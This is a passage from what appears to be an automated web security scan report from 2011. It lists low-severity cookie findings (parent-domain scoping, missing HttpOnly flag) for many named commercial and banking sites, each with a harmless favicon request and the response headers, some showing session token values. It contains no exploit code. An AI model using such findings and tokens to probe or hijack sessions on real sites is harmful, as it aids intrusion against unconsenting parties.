User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.veoh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=D44A495F-8033-AE3D-9C5D-F70504C464C9&LastUpdate=02/Apr/2011:06:34:13 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:13 GMT; Path=/
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:34:13 GMT
Last-Modified: Thu, 31 Mar 2011 10:42:18 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: image/x-icon

..............h...&......... .h.......(....... ................................r............J.......J.......v...........J...........b.......F...>...........2.......J.......V...:...F...>......."...>...
...[SNIP]...
13.80. http://www.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...
13.81. http://www.virtualtourist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtualtourist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtualtourist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:53:04 GMT
Accept-Ranges: bytes
Set-Cookie: VTT=64.14.197.3.1301752384.816877; Path=/; Domain=.virtualtourist.com
Last-Modified: Tue, 15 Mar 2011 01:29:34 GMT
Content-Length: 708

BM............(...............................c...c...................k[Q.{ka.............V&...B    ..F
..F
..?    ..>    .~8..z6..?...i/..W'..J!..(....I...M...R...T...C...W"..\(..`-.H(...j:..l<..l=..^6..yM...
...[SNIP]...
13.82. http://www.vistaprint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vistaprint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=CA22C9248E11B2CF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

............ .h.......(....... ..... .....@.....................J...M...O...Q...S...U...Y...]..._...^..._...`...b...c...e...i...@...Z..._...e...j...q.......................................d...7...J...
...[SNIP]...
13.83. http://www.wachovia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wachovia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:33:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D2B46F245D2D105D5E8AE140D73CF7D1; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/favicon.ico
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...
13.84. http://www.warnerbros.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.warnerbros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:00 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D97255037F000006CE1590-www-wb-web13; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 27 Mar 2008 22:51:38 GMT
ETag: "6174a9-47e-737b280"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

............ .h.......(....... ..... ...................................................:...:q..:e..:s..................................................:...:...:^..:...:n..............................
...[SNIP]...
13.85. http://www.wellsfargo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellsfargo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:51 GMT
Content-length: 1150
Content-type: image/x-icon
Set-Cookie: v1st=6F0DE9B2A6C80BB2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Thu, 06 Jan 2011 21:04:58 GMT
Etag: "47e-4d262e7a"
Accept-ranges: bytes

............ .h.......(....... ..... .........................&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&.
...[SNIP]...
13.86. http://www.whitepages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...
13.87. http://www.wsbtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

..............h.......(....... ................................T.`...................................J...U..U..T..D.J...............................=...O..T..T..U..U.:.........................5..
...[SNIP]...
13.88. http://www.yellowpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:06 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: image/x-icon
Content-Length: 5430
Last-Modified: Fri, 01 Apr 2011 18:42:25 GMT
Expires: Mon, 02 May 2011 12:43:06 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

............ .h...&... .... .........(....... ..... .........................U..-8...+...'...&...$...!...........!...$...&...'...+...:...Y..*6...(...'...$...................................$...'...(.
...[SNIP]...
14. Cookie without HttpOnly flag set  previous  next
There are 219 instances of this issue:

14.1. http://www.androidcentral.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
14.2. http://www.aon.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=360E2570D83D50BAD68AE8A16269ABE6; Path=/
Location: http://www.aon.com/default.jsp
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 14:03:32 GMT
Content-Length: 0

14.3. http://www.biglots.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.biglots.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biglots.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Set-Cookie: JSESSIONID=9EE15E1A14FD5B47D59D04701296C03D.108prd3; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Content-Length: 30138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- layouts/mai
...[SNIP]...
14.4. http://www.bullishbankers.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bullishbankers.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullishbankers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:06:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=a70ecd980c5c9f83309c1b6e14b4625a; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: mtaShowAfter=deleted; expires=Fri, 02-Apr-2010 14:06:41 GMT; path=/
Set-Cookie: mtaVisits=1; expires=Sun, 01-Apr-2012 14:06:42 GMT; path=/
X-Pingback: http://www.bullishbankers.com/xmlrpc.php
Last-Modified: Sat, 02 Apr 2011 14:06:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head profile="ht
...[SNIP]...
14.5. http://www.centurylink.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.centurylink.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.centurylink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Date: Sat, 02 Apr 2011 13:41:20 GMT
Set-Cookie: JSESSIONID=058DC83CFF20F0556672C70F0763786E08375B6BF0.dotcomprd4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding,User-Agent
X-Pad: avoid browser bug
Content-Length: 11721


                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   
       <title>CenturyL
...[SNIP]...
14.6. http://www.chacha.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chacha.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chacha.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E96D1F42FF3550AE37BF16CECFBB552; Path=/
ETag: W/"9662-1285960496000"
Last-Modified: Fri, 01 Oct 2010 19:14:56 GMT
Content-Language: en-US
Content-Length: 9662
Date: Sat, 02 Apr 2011 12:43:27 GMT

......00.... ..%......(...0...`..... ......%.........................................E..................................................................................................................
...[SNIP]...
14.7. http://www.emedicinehealth.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.emedicinehealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedicinehealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/emh.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQCRSBDB=OFANAHPCLOBCCKCBDEMOCPGC; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:25 GMT

14.8. http://www.evite.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evite.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 4414
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200628547; path=/; domain=.evite.com


<!-- -->


<html>
<head>
<title>Evite</title>
<style type="text/css">@import url(http://cdn.evite.com/html/css/wizard_ie.css?ver=);</style>
<link rel="stylesheet" type="t
...[SNIP]...
14.9. http://www.freeridegames.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeridegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=454706C5579DD4BBE9DEF3994E49D6C7; Path=/
Set-Cookie: 143_userName=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_password=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_TURNKEY=Default-551301751188525286; Expires=Sun, 01-Apr-2012 13:33:08 GMT; Path=/
Set-Cookie: 143_CAMPAIGN_SERIAL_ID=Default-Default; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Set-Cookie: 143_FIRST_BROWSER="Default-MSIE 7.0"; Version=1; Max-Age=7776000; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Accept-Ranges: bytes
ETag: W/"60157-1301309068734"
Last-Modified: Mon, 28 Mar 2011 10:44:28 GMT
Content-Length: 60157
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Games - D
...[SNIP]...
14.10. http://www.genealogy.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

..............h...&... ..............(....... ...........@......................................J...........a.../.......]...................r...<...!...........g...................Q...(...B...x...W.
...[SNIP]...
14.11. http://www.gofreecredit.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gofreecredit.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gofreecredit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=4pqo3dq4ottaqjnelc03n7u4c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status404: File not found
Set-Cookie: uid=ChViBk2XJhuPAz5VA1tVAg==; expires=Sun, 01-Apr-12 13:35:23 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uid=0CuC3E2XJhtzRyLkA2FQAg==; expires=Sun, 01-Apr-12 13:35:23 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...
14.12. http://www.hayneedle.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
14.13. http://www.kaboodle.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /favicon.ico

Issue detail

